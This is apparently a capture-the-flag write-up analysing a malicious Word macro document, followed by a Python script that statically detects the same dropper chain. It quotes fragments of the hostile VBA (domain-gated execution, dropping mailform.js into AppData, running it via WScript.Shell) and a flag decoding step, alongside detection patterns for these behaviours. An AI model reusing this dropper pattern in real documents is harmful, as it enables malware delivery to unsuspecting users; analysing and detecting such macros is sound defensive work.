Game Invitation Writeup
Cyber Apocalypse 2024
Solved by : thewhiteh4t
- The challenge talks about receiving a malicious docm file in an email
- We managed to solve the challenge using Windows and MS Office 2016
- We inspected the macros in the document and here is a brief flow:
  - it checks the host domain and proceeds if it matches

        chkDomain = "GAMEMASTERS.local"
        strUserDomain = Environ$("UserDomain")
        If chkDomain <> strUserDomain Then

  - opens the current document in binary mode

        Open (ActiveDocument.FullName) For Binary As #gIvqmZwiW

  - uses regex to match a set pattern

        SwMbxtWpP = StrConv(CbkQJVeAG, vbUnicode)
        Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
        Dim vTxAnSEFH
        Set vTxAnSEFH = CreateObject("vbscript.regexp")
        vTxAnSEFH.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa"
        Set I4j833DS5SFd34L3gwYQD = vTxAnSEFH.Execute(SwMbxtWpP)

  - gets the AppData dir path and writes mailform.js

        kWXlyKwVj = Environ("appdata") & "\Microsoft\Windows"
        Set aMUsvgOin = CreateObject("Scripting.FileSystemObject")
        If Not aMUsvgOin.FolderExists(kWXlyKwVj) Then
            kWXlyKwVj = Environ("appdata")
        End If
        Set aMUsvgOin = Nothing
        Dim K764B5Ph46Vh
        K764B5Ph46Vh = FreeFile
        IAiiymixt = kWXlyKwVj & "\" & "mailform.js"

  - uses wscript to run mailform.js

        Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
        R66BpJMgxXBo2h.Run """" + IAiiymixt + """" + " vF8rdgMHKBrvCoCp0ulm"

  - finally it runs cleanup and deletes mailform.js
- First we can modify the domain check to bypass that condition

      chkDomain = "GAMEMASTERS.local"
      ' original: strUserDomain = Environ$("UserDomain")
      strUserDomain = "GAMEMASTERS.local" ' simply replace it with the domain
      If chkDomain <> strUserDomain Then

- In the mailform.js file we can add one extra statement to print the output of the function just before it hits eval, as highlighted below:
- Now we can use cscript, which is a CMD alternative of wscript, to read the output it will print:
- In the noise we can see a cookie being sent with a base64 string
> echo "SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=" | base64 -d
> HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}
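
The macro flow described above can also be checked for statically, without opening the document in Office. The following Python triage is an added example, not part of the original writeup or the challenge files: it looks for each step of the chain in extracted macro source and pulls out the hard-coded domain and dropped file name. The rule names, function names, script-extension list and the `.local` domain pattern are assumptions of this example; the sample input is assembled from the excerpts quoted above.

```python
import re

# Constructed sample: the macro excerpts quoted in the writeup, joined together.
SAMPLE_MACRO = r'''
chkDomain = "GAMEMASTERS.local"
strUserDomain = Environ$("UserDomain")
If chkDomain <> strUserDomain Then
Open (ActiveDocument.FullName) For Binary As #gIvqmZwiW
Set vTxAnSEFH = CreateObject("vbscript.regexp")
kWXlyKwVj = Environ("appdata") & "\Microsoft\Windows"
IAiiymixt = kWXlyKwVj & "\" & "mailform.js"
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
R66BpJMgxXBo2h.Run """" + IAiiymixt + """" + " vF8rdgMHKBrvCoCp0ulm"
'''

# A quoted file name with a Windows Script Host extension (list is an assumption).
SCRIPT_NAME = r'"([^"\\]+\.(?:js|jse|vbs|vbe|wsf|hta))"'
# Behaviour name -> patterns that must all be present (names are this example's own).
RULES = {
    "environment_gate": [r'Environ\$?\(\s*"UserDomain"\s*\)'],
    "reads_own_file": [r'Open\s*\(?\s*ActiveDocument\.FullName\s*\)?\s*For\s+Binary'],
    "regex_engine": [r'CreateObject\(\s*"vbscript\.regexp"\s*\)'],
    "script_in_appdata": [r'Environ\$?\(\s*"appdata"\s*\)', SCRIPT_NAME],
    "shell_run": [r'CreateObject\(\s*"WScript\.Shell"\s*\)', r'\.Run\b'],
}

def triage_macro(source):
    """Return, in rule order, the behaviours whose patterns all appear."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, source, re.IGNORECASE) for p in pats)]

def extract_indicators(source):
    """Pull the hard-coded strings an analyst would pivot on."""
    domain = re.search(r'"([\w-]+\.local)"', source, re.IGNORECASE)
    dropped = re.search(SCRIPT_NAME, source, re.IGNORECASE)
    return {
        "gated_domain": domain.group(1) if domain else None,
        "dropped_file": dropped.group(1) if dropped else None,
    }

def verdict(source):
    """Flag the full chain: own-file read, script path in AppData, shell run."""
    hits = set(triage_macro(source))
    chain = {"reads_own_file", "script_in_appdata", "shell_run"}
    return "dropper-chain" if chain <= hits else ("suspicious" if hits else "clean")

if __name__ == "__main__":
    print(triage_macro(SAMPLE_MACRO), extract_indicators(SAMPLE_MACRO), verdict(SAMPLE_MACRO))
```

Macro source for a check like this can be extracted with a tool such as olevba from oletools, which reads the VBA project without executing it.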